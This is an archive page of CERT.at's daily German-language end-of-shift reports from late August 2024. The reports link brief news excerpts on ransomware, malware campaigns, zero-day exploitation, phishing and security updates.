===================== = End-of-Day report = ===================== Timeframe: Freitag 30-08-2024 18:00 − Montag 02-09-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Administrative IT infiltriert: Cyberangriff trifft Deutsche Flugsicherung ∗∗∗ --------------------------------------------- Nach Angaben eines Unternehmenssprechers betrifft der Vorfall die Büro-IT der DFS. Auswirkungen auf den Flugverkehr hat der Angriff wohl nicht. [..] Wer genau hinter dem Cyberangriff auf die Deutsche Flugsicherung steckt, lässt sich noch nicht mit Gewissheit beantworten. [..] Derzeit sei das Unternehmen dabei, den Vorfall einzudämmen und dessen Auswirkungen zu minimieren. --------------------------------------------- https://www.golem.de/news/administrative-it-infiltriert-cyberangriff-trifft… ∗∗∗ TSA-Airport-Sicherheitskontrollen per SQL-Injection ausgehebelt ∗∗∗ --------------------------------------------- Sicherheitsforschern in den USA ist es gelungen, über SQL-Injection das FlyCASS-Sicherheitssystem zu täuschen und damit Zugangssperren zu umgehen. --------------------------------------------- https://heise.de/-9853305 ∗∗∗ Windows: Side-Loading DLL-Angriffe über licensingdiag.exe ∗∗∗ --------------------------------------------- Wer sich um den Punkt Windows-Sicherheit Gedanken macht, sollte das Befehlszeilentool licensingdiag.exe im Fokus behalten. Es ist ein weiteres "living of the land" Tool, welches für Side-Loading DLL-Angriffe genutzt werden kann. --------------------------------------------- https://www.borncity.com/blog/2024/09/01/windows-side-loading-dll-angriffe-… ∗∗∗ Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant ∗∗∗ --------------------------------------------- Unit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies. --------------------------------------------- https://unit42.paloaltonetworks.com/global-protect-vpn-spoof-distributes-wi… ∗∗∗ GitHub comments abused to push password stealing malware masked as fixes ∗∗∗ --------------------------------------------- GitHub is being abused to distribute the Lumma Stealer information-stealing malware as fake fixes posted in project comments. [..] The solution tells people to download a password-protected archive from mediafire.com or through a bit.ly URL and run the executable within it. In the current campaign, the password has been "changeme" in all the comments we have seen. --------------------------------------------- https://www.bleepingcomputer.com/news/security/github-comments-abused-to-pu… ∗∗∗ Docker-OSX image used for security research hit by Apple DMCA takedown ∗∗∗ --------------------------------------------- The popular Docker-OSX project has been removed from Docker Hub after Apple filed a DMCA (Digital Millennium Copyright Act) takedown request, alleging that it violated its copyright. --------------------------------------------- https://www.bleepingcomputer.com/news/security/docker-osx-image-used-for-se… ∗∗∗ Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems ∗∗∗ --------------------------------------------- A new ransomware-as-a-service (RaaS) operation named Cicada3301 has already listed 19 victims on its extortion portal, as it quickly attacked companies worldwide. [..] An analysis of the new malware by Truesec revealed significant overlaps between Cicada3301 and ALPHV/BlackCat, indicating a possible rebrand or a fork created by former ALPHV's core team members. [..] For context, ALPHV performed an exit scam in early March 2024 involving fake claims about an FBI takedown operation after they stole a massive $22 million payment from Change Healthcare from one of their affiliates. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cicada3301-ransomwares-linux… ∗∗∗ Ausweiskopie und persönliche Daten an Kriminelle weitergegeben? Das können Sie tun ∗∗∗ --------------------------------------------- Sie wurden Opfer einer Betrugsmasche und haben dabei persönliche Daten oder sogar Ausweiskopien übermittelt? Wir zeigen Ihnen, was Sie tun können, wenn Kriminelle Ihre Daten ergaunert haben! --------------------------------------------- https://www.watchlist-internet.at/news/ausweiskopie-und-persoenliche-daten-… ∗∗∗ Malware "Voldemort": Angreifer nehmen verstärkt Steuerzahler ins Visier ∗∗∗ --------------------------------------------- Eine neue Angriffswelle zielt verstärkt auf Steuerbehörden, aber auch auf andere Behörden und Unternehmen verschiedener Länder ab, auch hierzulande. Dabei wird die Malware "Voldemort" über Phishing-Mails verbreitet. Wer klickt, installiert sich womöglich eine Backdoor. [..] Über die Hälfte der betroffenen Organisationen stammt aus den Bereichen Versicherungen, Luft- und Raumfahrt, Verkehr und Bildung. --------------------------------------------- https://heise.de/-9854106 ===================== = Vulnerabilities = ===================== ∗∗∗ Fortra fixed two severe issues in FileCatalyst Workflow, including a critical flaw ∗∗∗ --------------------------------------------- Cybersecurity and automation company Fortra released patches for two vulnerabilities in FileCatalyst Workflow. Once of the vulnerabilities is a critical issue, tracked as CVE-2024-6633 (CVSS score of 9.8) described as Insecure Default in FileCatalyst Workflow Setup. --------------------------------------------- https://securityaffairs.com/167838/security/fortra-filecatalyst-critical-wo… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (postgresql:16), Debian (dovecot, pymatgen, ruby2.7, systemd, and webkit2gtk), Fedora (microcode_ctl, python3.11, vim, and xen), Oracle (kernel, postgresql:12, postgresql:13, postgresql:15, and python39:3.9 and python39-devel:3.9), Slackware (libpcap), SUSE (cacti, cacti-spine, python-Django, and trivy), and Ubuntu (dovecot). --------------------------------------------- https://lwn.net/Articles/988364/ ∗∗∗ WordPress Vulnerability & Patch Roundup August 2024 ∗∗∗ --------------------------------------------- https://blog.sucuri.net/2024/08/wordpress-vulnerability-patch-roundup-augus… ∗∗∗ MISP 2.4.197 released with many bugs fixed, a security fix and improvements. ∗∗∗ --------------------------------------------- https://github.com/MISP/MISP/releases/tag/v2.4.197 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.08.2024
by Daily end-of-shift report 30 Aug '24

30 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 29-08-2024 18:00 − Freitag 30-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Fake Palo Alto GlobalProtect used as lure to backdoor enterprises ∗∗∗ --------------------------------------------- Threat actors target Middle Eastern organizations with malware disguised as the legitimate Palo Alto GlobalProtect Tool that can steal data and execute remote PowerShell commands to infiltrate internal networks further. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fake-palo-alto-globalprotect… ∗∗∗ FBI: RansomHub ransomware breached 210 victims since February ∗∗∗ --------------------------------------------- Since surfacing in February 2024, RansomHub ransomware affiliates have breached over 200 victims from a wide range of critical U.S. infrastructure sectors. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fbi-ransomhub-ransomware-bre… ∗∗∗ Russische Hacker nutzen die gleichen Lücken wie Staatstrojaner ∗∗∗ --------------------------------------------- Immer wieder warnen Experten davor, dass auch Kriminelle jene Schlupflöcher nutzen können, über die auch Regierungen Verdächtige überwachen. --------------------------------------------- https://futurezone.at/netzpolitik/russische-hacker-staatstrojaner-messenger… ∗∗∗ Studie: 78 Prozent aller Ransomware-Opfer zahlen offenbar Lösegeld ∗∗∗ --------------------------------------------- Viele betroffene Unternehmen zahlen wohl sogar mehrfach. Auch vier- oder mehr Lösegeldzahlungen sind keine Seltenheit - vor allem nicht in Deutschland. --------------------------------------------- https://www.golem.de/news/studie-78-prozent-aller-ransomware-opfer-zahlen-o… ∗∗∗ Feds claim sinister sysadmin locked up thousands of Windows workstations, demanded ransom ∗∗∗ --------------------------------------------- Sordid search history evidence in case that could see him spend 35 years for extortion and wire fraud A former infrastructure engineer who allegedly locked IT department colleagues out of their employers systems, then threatened to shut down servers unless paid a ransom, has been arrested and charged after an FBI investigation. --------------------------------------------- https://www.theregister.com/2024/08/29/vm_engineer_extortion_allegations/ ∗∗∗ How to enhance the security of your social media accounts ∗∗∗ --------------------------------------------- TL;DR Strong passwords: Use a password manager. Multi-factor authentication (MFA): MFA requires multiple forms of identification, adding an extra layer of security. This makes it harder for unauthorised users to .. --------------------------------------------- https://www.pentestpartners.com/security-blog/how-to-enhance-the-security-o… ∗∗∗ TLD Tracker: Exploring Newly Released Top-Level Domains ∗∗∗ --------------------------------------------- Unit 42 researchers use a novel graph-based pipeline to detect misuse of 19 new TLDs for phishing, chatbots and more in several case studies. --------------------------------------------- https://unit42.paloaltonetworks.com/tracking-newly-released-top-level-domai… ∗∗∗ Malicious North Korean packages appear again in open source code repository ∗∗∗ --------------------------------------------- North Korean hackers continue to exploit the widely used npm code repository, publishing malicious packages intended to infect software developers’ devices with malware, according to recent research. --------------------------------------------- https://therecord.media/npm-javascript-repository-north-korean-malware ∗∗∗ TR-88 - Motivation, procedure and rational for leaked credential notifications ∗∗∗ --------------------------------------------- In today’s digital landscape, protecting user data is essential for every organization. When public data leaks expose customer credentials, it is critical to respond promptly to mitigate risks. This document outlines why CIRCL .. --------------------------------------------- https://www.circl.lu/pub/tr-88 ∗∗∗ Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence ∗∗∗ --------------------------------------------- Trend Micro discovered that old Atlassian Confluence versions that were affected by CVE-2023-22527 are being exploited using a new in-memory fileless backdoor. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.… ∗∗∗ Gaps in Skills, Knowledge, and Technology Pave the Way for Breaches ∗∗∗ --------------------------------------------- The stakes continue growing higher for organizations when it comes to cybersecurity incidents, with the fallout of such incidents becoming more costly and complex. According to the Fortinet 2024 Cybersecurity Skills Gap Report, the overwhelming majority (87%) of those surveyed said they experienced one or .. --------------------------------------------- https://www.fortinet.com/blog/industry-trends/gaps-in-skills-knowledge-tech… ∗∗∗ Ransomware Roundup - Underground ∗∗∗ --------------------------------------------- The Underground ransomware has victimized companies in various industries since July 2023. It encrypts files without changing the original file extension. --------------------------------------------- https://www.fortinet.com/blog/threat-research/ransomware-roundup-underground ∗∗∗ Nach Cyberangriff: Solaranbieter "Qcells" informiert Kunden über Datenleck ∗∗∗ --------------------------------------------- Wieder gibt es ein Datenleck in der Solarbranche. Kunden von Qcell werden darum informiert. --------------------------------------------- https://heise.de/-9852641 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (libvpx, postgresql, postgresql:12, postgresql:13, postgresql:15, and python39:3.9 and python39-devel:3.9), Debian (chromium and ghostscript), Fedora (python3.13), and SUSE (chromium and podman). --------------------------------------------- https://lwn.net/Articles/987836/ ∗∗∗ DSA-5761-1 chromium - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00174.html ∗∗∗ IPCOM vulnerable to information disclosure ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN29238389/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.08.2024
by Daily end-of-shift report 29 Aug '24

29 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 28-08-2024 18:00 − Donnerstag 29-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Unpatchable 0-day in surveillance cam is being exploited to install Mirai ∗∗∗ --------------------------------------------- Vulnerability is easy to exploit and allows attackers to remotely execute commands. --------------------------------------------- https://arstechnica.com/?p=2046043 ∗∗∗ Iranian hackers work with ransomware gangs to extort breached orgs ∗∗∗ --------------------------------------------- An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims. --------------------------------------------- https://www.bleepingcomputer.com/news/security/iranian-hackers-work-with-ra… ∗∗∗ Endlich: Maßnahme gegen Anrufe mit gefälschten Nummern tritt in Kraft ∗∗∗ --------------------------------------------- Dass die eigene Handynummer für Spamanrufe genutzt wird, soll ab dem 1. September nicht mehr möglich sein. --------------------------------------------- https://futurezone.at/netzpolitik/rtr-veordnung-massnahme-nummer-gefaelscht… ∗∗∗ Peach Sandstorm deploys new custom Tickler malware in long-running intelligence gathering operations ∗∗∗ --------------------------------------------- Between April and July 2024, Microsoft observed Iranian state-sponsored threat actor Peach Sandstorm deploying a new custom multi-stage backdoor, which we named Tickler. Tickler has been used in attacks against targets in the satellite, communications equipment, oil and gas, as well as federal and state government sectors in the United States and the .. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-de… ∗∗∗ Cybercrime and Sabotage Cost German Firms $300 Billion In Past Year ∗∗∗ --------------------------------------------- According to a new survey from Bitkom, cybercrime and other acts of sabotage have cost German companies around $298 billion in the past year, up 29% on the year before. Reuters reports: Bitkom surveyed around 1,000 companies from all sectors and found that 90% expect more cyberattacks in the next 12 months, with the remaining 10% expecting the same level of .. --------------------------------------------- https://it.slashdot.org/story/24/08/28/211228/cybercrime-and-sabotage-cost-… ∗∗∗ 12 Best Practices to Secure Your WordPress Login Page ∗∗∗ --------------------------------------------- WordPress powers a significant portion of websites on the internet. With this popularity comes the need for strict security measures, especially for the login page. These entry points are prime targets for hackers and malicious actors. By implementing proper security practices outlined in this guide, you can maintain a secure WordPress login and .. --------------------------------------------- https://blog.sucuri.net/2024/08/12-best-practices-to-secure-your-wordpress-… ∗∗∗ Microsoft hosts a security summit but no press, public allowed ∗∗∗ --------------------------------------------- CrowdStrike, other vendors, friendly govt reps .. but not anyone who would tell you what happened op-ed Microsoft will host a security summit next month with CrowdStrike and other "key" endpoint security partners joining the fun - and during which the CrowdStrike-induced outage that borked millions of Windows machines will undoubtedly be a top-line agenda item. --------------------------------------------- https://www.theregister.com/2024/08/28/microsoft_closed_security_summit/ ∗∗∗ Censys Finds Hundreds of Exposed Servers as Volt Typhoon APT Targets Service Providers ∗∗∗ --------------------------------------------- Amidst Volt Typhoon zero-day exploitation, Censys finds hundreds of exposed servers presenting ripe attack surface for attackers. --------------------------------------------- https://www.securityweek.com/censys-finds-hundreds-of-exposed-servers-as-vo… ∗∗∗ Telegram als Betrugsfalle ∗∗∗ --------------------------------------------- Der Kurznachrichtendienst Telegram ist spätestens seit der Verhaftung des Erfinders Pawel Durow in Paris in aller Munde. Telegram beschäftigt uns bei der Watchlist Internet aber schon viel länger. Kaum woanders gelingt es Kriminellen besser, Opfer in ihre Fallen zu locken. Insbesondere Investitionsbetrug, Schneeballsysteme und betrügerische Jobangebote sorgen teils für horrende Schadenssummen. Konsequenzen gibt es auf Telegram für die Kriminellen bisher keine. --------------------------------------------- https://www.watchlist-internet.at/news/telegram-als-betrugsfalle/ ∗∗∗ $2.5 million reward offered for hacker linked to notorious Angler Exploit Kit ∗∗∗ --------------------------------------------- Who doesnt fancy earning US $2.5 million? Thats the reward thats on offer from US authorities for information leading to the arrest and/or conviction of the man who allegedly was a key figure behind the development and distribution of the notorious Angler Exploit Kit. Read more in my article on the Tripwire State of Security blog. --------------------------------------------- https://www.tripwire.com/state-of-security/25-million-reward-offered-cyber-… ∗∗∗ Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks ∗∗∗ --------------------------------------------- The BlackByte ransomware gang is only posting a fraction of its successful attacks on its leak site this year, according to researchers from Cisco. --------------------------------------------- https://therecord.media/blackbyte-ransomware-group-posting-fraction-of-leaks ∗∗∗ State-backed attackers and commercial surveillance vendors repeatedly use the same exploits ∗∗∗ --------------------------------------------- We’re sharing an update on suspected state-backed attacker APT29 and the use of exploits identical to those used by Intellexa and NSO. --------------------------------------------- https://blog.google/threat-analysis-group/state-backed-attackers-and-commer… ∗∗∗ The Big TIBER Encyclopedia ∗∗∗ --------------------------------------------- An analysis of current TIBER implementations ahead of DORA’s TLPT requirements Introduction TIBER (Threat Intelligence-Based Ethical Red Teaming) is a framework introduced by the European Central Bank (ECB) in 2018 as a response to the increasing number of cyber threats faced by financial institutions. The framework provides a .. --------------------------------------------- https://blog.nviso.eu/2024/08/29/the-big-tiber-encyclopedia/ ∗∗∗ The vulnerabilities we uncovered by fuzzing µC/OS protocol stacks ∗∗∗ --------------------------------------------- Fuzzing has long been one of our favorite ways to search for security issues or vulnerabilities in software, but when it comes to fuzzing popular systems used in ICS environments, it traditionally involved a custom hardware setup to fuzz the code in its native environment. --------------------------------------------- https://blog.talosintelligence.com/fuzzing-uc-os-protocol-stacks/ ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Family August 2024 First Round Security Update Advisory ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82727/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.08.2024
by Daily end-of-shift report 28 Aug '24

28 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 27-08-2024 18:00 − Mittwoch 28-08-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ ISPs infiltriert: Zero Day seit Monaten ausgenutzt ∗∗∗ --------------------------------------------- Eine Sicherheitslücke der Netzwerksoftware Versa Director (CVE-2024-39717) wird stärker ausgenutzt als zunächst bekannt. Bei mindestens drei Internet Service Providern (ISP) in den USA und einem außerhalb des Landes haben sich Angreifer eingenistet, um Kundenlogins und Passwörter im Klartext abzufangen, bevor sie gehasht und beim ISP gespeichert werden. [..] Der Angriff schlägt fehl, wenn die Versa-Patches installiert wurden oder wenn Port 4566 von Kundenroutern aus nicht erreichbar ist. Für Letzteres empfiehlt Versa bereits seit Jahren passende Firewall-Einstellungen und Systemhärtungen. --------------------------------------------- https://heise.de/-9849553 ∗∗∗ ADAC warnt: Die meisten Keyless-Systeme weiterhin leicht zu knacken ∗∗∗ --------------------------------------------- Der ADAC hat rund 700 Fahrzeuge mit Keyless-Schließsystem getestet. Mehr als 90 Prozent davon lassen sich per Relay-Angriff aus der Ferne öffnen und starten. --------------------------------------------- https://www.golem.de/news/adac-warnt-die-meisten-keyless-systeme-weiterhin-… ∗∗∗ Windows Downdate: Tool zum Öffnen alter Windows-Lücken veröffentlicht ∗∗∗ --------------------------------------------- Mit Windows Downdate können Windows-Komponenten wie DLLs, Treiber oder der NT-Kernel unbemerkt auf anfällige Versionen zurückgestuft werden. Das Tool ist nun öffentlich. --------------------------------------------- https://www.golem.de/news/windows-downdate-tool-zum-oeffnen-alter-windows-l… ∗∗∗ Betrügerische Abmahnung im Namen von Pornhub ∗∗∗ --------------------------------------------- „Letzte Mahnung vor Klageerhebung“ lautet der Betreff einer beunruhigenden E-Mail. Die Kanzlei Frommer Legal verschickt derzeit wahllos E-Mails, in denen behauptet wird, man habe urheberrechtlich geschützte Inhalte von Pornhub.com gestreamt. --------------------------------------------- https://www.watchlist-internet.at/news/abmahnung-pornhub/ ∗∗∗ Intels Software Guard Extensions broken? Dont panic ∗∗∗ --------------------------------------------- Today's news that Intel's Software Guard Extensions (SGX) security system is open to abuse may be overstated. [..] However, Intel has pointed out that not only would an attacker need physical access to a machine to make this work, but that string of issues would have to have been left unfixed. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/08/27/intel_root_k… ∗∗∗ New QR Code Phishing Campaign Exploits Microsoft Sway to Steal Credentials ∗∗∗ --------------------------------------------- Cybersecurity researchers are calling attention to a new QR code phishing (aka quishing) campaign that leverages Microsoft Sway infrastructure to host fake pages, once again highlighting the abuse of legitimate cloud offerings for malicious purposes. --------------------------------------------- https://thehackernews.com/2024/08/new-qr-code-phishing-campaign-exploits.ht… ∗∗∗ New LummaC2 Malware Variant Uses PowerShell, Obfuscation to Steal Data ∗∗∗ --------------------------------------------- Ontinue has discovered a new LummaC2 malware variant with increased activity, using PowerShell for initial infection and employing obfuscation and process injection to steal sensitive data. --------------------------------------------- https://hackread.com/lummac2-malware-variant-powershell-obfuscation-steal-d… ∗∗∗ Old devices, new dangers: The risks of unsupported IoT tech ∗∗∗ --------------------------------------------- Outdated devices can be easy targets, so by keeping them disconnected from the internet or discontinuing their use, you can feel safe and secure from any cyber harm through them. --------------------------------------------- https://www.welivesecurity.com/en/internet-of-things/old-devices-new-danger… ∗∗∗ CVE-2024-37079: VMware vCenter Server Integer Underflow Code Execution Vulnerability ∗∗∗ --------------------------------------------- A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted DCERPC packet to the target server. Successfully exploiting this vulnerability could lead to a heap buffer overflow, which could result in the execution of arbitrary code in the context of the vulnerable service. [..] This vulnerability was patched by the vendor in June. At the time of the patch release, there was a fair amount of attention paid to this vulnerability. However, to date, there have been no attacks detected in the wild. --------------------------------------------- https://www.thezdi.com/blog/2024/8/27/cve-2024-37079-vmware-vcenter-server-… ∗∗∗ BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks ∗∗∗ --------------------------------------------- In recent investigations, Talos Incident Response has observed the BlackByte ransomware group using techniques that depart from their established tradecraft. --------------------------------------------- https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecra… ∗∗∗ Deep Analysis of Snake Keylogger’s New Variant ∗∗∗ --------------------------------------------- We performed a deep analysis on the campaign and discovered that it delivers a new variant of Snake Keylogger. --------------------------------------------- https://feeds.fortinet.com/~/903638177/0/fortinet/blogs~Deep-Analysis-of-Sn… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (calibre, dotnet8.0, dovecot, webkit2gtk4.0, and webkitgtk), Oracle (nodejs:20), Red Hat (bind, bind and bind-dyndb-ldap, postgresql:16, and squid), Slackware (kcron and plasma), SUSE (keepalived and webkit2gtk3), and Ubuntu (drupal7). --------------------------------------------- https://lwn.net/Articles/987519/ ∗∗∗ DSA-5759-1 python3.11 - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00172.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.08.2024
by Daily end-of-shift report 27 Aug '24

27 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Montag 26-08-2024 18:00 − Dienstag 27-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers infect ISPs with malware that steals customers’ credentials ∗∗∗ --------------------------------------------- Zero-day that was exploited since June to infect ISPs finally gets fixed. --------------------------------------------- https://arstechnica.com/?p=2045401 ∗∗∗ Google tags a tenth Chrome zero-day as exploited this year ∗∗∗ --------------------------------------------- Today, Google revealed that it patched the tenth zero-day exploited in the wild in 2024 by attackers or security researchers during hacking contests. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-tags-a-tenth-chrome-z… ∗∗∗ Exposed and Encrypted: Inside a Mallox Ransomware Attack ∗∗∗ --------------------------------------------- Recently, a client enlisted the support of Trustwave to investigate an unauthorized access incident within its internal cloud-based environment, leading to the deployment of Mallox ransomware by threat actors to its server. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exposed-and… ∗∗∗ Microsoft mistake blows up admins inboxes with fake malware alerts ∗∗∗ --------------------------------------------- Legitimate emails misclassified in software snafu Updated Many administrators have had a trying Monday after getting spammed out with false malware reports by Microsoft. --------------------------------------------- https://www.theregister.com/2024/08/26/microsoft_365_email_malware/ ∗∗∗ ThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 2 ∗∗∗ --------------------------------------------- In Part 1 of this series, we’ve demonstrated how ThreatLabz reverse engineered the SketchUp 3D library in Microsoft 365 as well as the SKP file format. Furthermore, we developed two effective fuzzing harnesses.Microsoft published CVE-2023-28285 and CVE-2023-29344 (in April and May of 2023, respectively) to address the vulnerabilities .. --------------------------------------------- https://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vu… ∗∗∗ A malicious Pidgin plugin ∗∗∗ --------------------------------------------- The developers of the Pidgin chat program have announced that a malicious plugin had been listed on its third-party plugins list for over one month. This plugin included a key logger and could capture screenshots. It went unnoticed at the time that the plugin was not providing any source code and was only providing binaries for download. Going forward, we will be .. --------------------------------------------- https://lwn.net/Articles/987320/ ∗∗∗ WordPress GiveWP POP to RCE (CVE-2024-5932) ∗∗∗ --------------------------------------------- A few days ago, Wordfence published a blog post about a PHP Object Injection vulnerability affecting the popular WordPress Plugin GiveWP in all versions <= 3.14.1. Since the blog post contains only information about (a part) of the POP chain used, I decided to take a look and build a fully functional Remote Code Execution exploit. This post describes .. --------------------------------------------- https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-59… ∗∗∗ 7777 Botnet – Insights into a Multi-Target Botnet ∗∗∗ --------------------------------------------- Our latest research, a collaboration between Bitsight TRACE & the security researcher Gi7w0rm, has uncovered additional details & information about the 7777 Botnet. --------------------------------------------- https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet ∗∗∗ NFC-Malware leert Bankkonten ∗∗∗ --------------------------------------------- Phishing und Malware kombiniert ein Angreifer, um Geldautomaten Bankkarten vorzuspielen und per NFC Geld abzuheben. Beobachtet wurde das in Tschechien. --------------------------------------------- https://heise.de/-9848256 ===================== = Vulnerabilities = ===================== ∗∗∗ Moodle: Remote Code Execution via Calculated Questions ∗∗∗ --------------------------------------------- Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system. --------------------------------------------- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/ ∗∗∗ ZDI-24-1182: Linux Kernel Netfilter Conntrack Type Confusion Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1182/ ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/987393/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 26.08.2024
by Daily end-of-shift report 26 Aug '24

26 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 23-08-2024 18:00 − Montag 26-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Stealthy sedexp Linux malware evaded detection for two years ∗∗∗ --------------------------------------------- A stealthy Linux malware named sedexp has been evading detection since 2022 by using a persistence technique not yet included in the MITRE ATT&CK framework. --------------------------------------------- https://www.bleepingcomputer.com/news/security/stealthy-sedexp-linux-malwar… ∗∗∗ BSI: Prüfung der Sicherheit von Huawei bleibt ein Staatsgeheimnis ∗∗∗ --------------------------------------------- Da die Sicherheitsinteressen Deutschlands berührt sind, legt das BSI die technische Prüfung von Huawei nicht offen. Immerhin hat Golem.de erreicht, dass die Einstufung überprüft wurde. --------------------------------------------- https://www.golem.de/news/bsi-pruefung-der-sicherheit-von-huawei-bleibt-ein… ∗∗∗ DSGVO-Verstoß: Uber soll 290 Millionen Euro Geldstrafe zahlen ∗∗∗ --------------------------------------------- Dem beliebten Fahrdienst wird vorgeworfen, mehr als zwei Jahre lang sensible Fahrerdaten bei unzureichendem Schutz in die USA übermittelt zu haben. --------------------------------------------- https://www.golem.de/news/datenuebertragung-in-die-usa-uber-soll-290-millio… ∗∗∗ From Highly Obfuscated Batch File to XWorm and Redline, (Mon, Aug 26th) ∗∗∗ --------------------------------------------- If you follow my diaries, you probably already know that one of my favorite topics around malware is obfuscation. I&#;x26;#;39;m often impressed by the crazy techniques attackers use to .. --------------------------------------------- https://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+R… ∗∗∗ SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access ∗∗∗ --------------------------------------------- SonicWall has released security updates to address a critical flaw impacting its firewalls that, if successfully exploited, could grant malicious actors unauthorized access to the devices. The vulnerability, tracked as .. --------------------------------------------- https://thehackernews.com/2024/08/sonicwall-issues-critical-patch-for.html ∗∗∗ Cisco calls for United Nations to revisit cyber-crime convention ∗∗∗ --------------------------------------------- Echoes human rights groups concerns that it could suppress free speech and more Networking giant Cisco has suggested the United Nations first-ever convention against cyber-crime is dangerously flawed and should be revised before being put to a formal vote. --------------------------------------------- https://www.theregister.com/2024/08/22/cisco_criticizes_un_cybercrime_conve… ∗∗∗ Post-Quantum Cryptography: Standards and Progress ∗∗∗ --------------------------------------------- The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures. In progress since 2016, this achievement represents a major milestone towards standards development that will keep information on the Internet secure and confidential for many years to come. --------------------------------------------- http://security.googleblog.com/2024/08/post-quantum-cryptography-standards.… ∗∗∗ Meta blockiert Whatsapp-Konten nach Hackerangriffen ∗∗∗ --------------------------------------------- Hierbei wurde die iranische Hackergruppe APT42 ins Visier genommen --------------------------------------------- https://www.derstandard.at/story/3000000233708/meta-blockiert-whatsapp-kont… ∗∗∗ CISA Adds One Known Exploited Vulnerability to Catalog for Versa Networks Director ∗∗∗ --------------------------------------------- CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/23/cisa-adds-one-known-expl… ∗∗∗ PEAKLIGHT: Decoding the Stealthy Memory-Only Malware ∗∗∗ --------------------------------------------- Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding… ===================== = Vulnerabilities = ===================== ∗∗∗ Stable Channel Update for Desktop ∗∗∗ --------------------------------------------- http://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desk… ∗∗∗ WPS Office Security Update Advisory ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82637/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.08.2024
by Daily end-of-shift report 23 Aug '24

23 Aug '24

